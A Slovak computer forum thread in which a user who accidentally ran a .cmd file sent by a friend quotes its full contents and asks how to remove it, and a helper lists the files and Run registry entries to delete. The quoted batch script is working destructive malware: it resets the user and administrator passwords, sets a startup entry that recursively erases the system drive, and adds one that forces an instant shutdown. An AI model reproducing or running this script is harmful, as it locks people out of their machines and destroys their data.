Čavte , práve som nechtiac spustil vírus koncovka *cmd ktorý ma za účel asi zničiť Windows . Keďže teraz to reinštalovať nemôžem potrebujem súrne pomôcť . Vírus je takýto :
echo off
net user %username% gghfghf
net user administrator gghfghf
echo Windows Registry Editor Version 5.00o > %homedrive%\windows\y.reg
echo.>> %homedrive%\windows\y.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %homedrive%\windows\y.reg
echo "ImagePath"="%homedrive%\\windows\\system_32.bat">> %homedrive%\windows\y.reg
reg import %homedrive%\windows\y.reg
echo erase /q /s %homedrive%\*.* >> "%homedrive%\\windows\\system_32.bat"
echo Windows Registry Editor Version 5.00o > %homedrive%\windows\z.reg
echo.>> %homedrive%\windows\z.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %homedrive%\windows\z.reg
echo "system_tray"="shutdown -s -f -t 0" >> %homedrive%\windows\z.reg
reg import %homedrive%\windows\z.reg
erase /q *.cmd
Viem že po reštarte budem mať heslo gghfghf , že po nabehnutí sa PC hneď vypne . To nemôžem dopustiť , preto musím PC nechať bežať kým tento vírus neodstránim . Chcem sa opýtať ktoré súbory zmazať alebo aké registre pomeniť aby sa toto nestalo , nesformatovalo mi HDD ... ? Ďakujem veľmi pekne
Spustenie nežiadúceho vírusu
-
asterix3691
Medium Star
- Príspevky: 405
- Registrovaný: 19 feb 2008, 10:24
- Kontaktovať používateľa:
Re: Spustenie nežiadúceho vírusu
vymaz si subory windows\y.reg, windows\z.reg a windows\system_32.bat
z registrov zmaz v HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vsetky polozky volajuce vyssie spomenute subory
z registrov zmaz v HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vsetky polozky volajuce vyssie spomenute subory
-
asterix3691
Medium Star
- Príspevky: 405
- Registrovaný: 19 feb 2008, 10:24
- Kontaktovať používateľa:
Re: Spustenie nežiadúceho vírusu
Ďakujem , kamoš mi to poslal že je to pecka program ja som vedel že už na koncovke *cmd niečo nehrá chcel som to zmazať a nechtiac som to otvoril a potom som si pozrel obsah toho CMD . Ďakujem za ochotu . Môžte LOCK 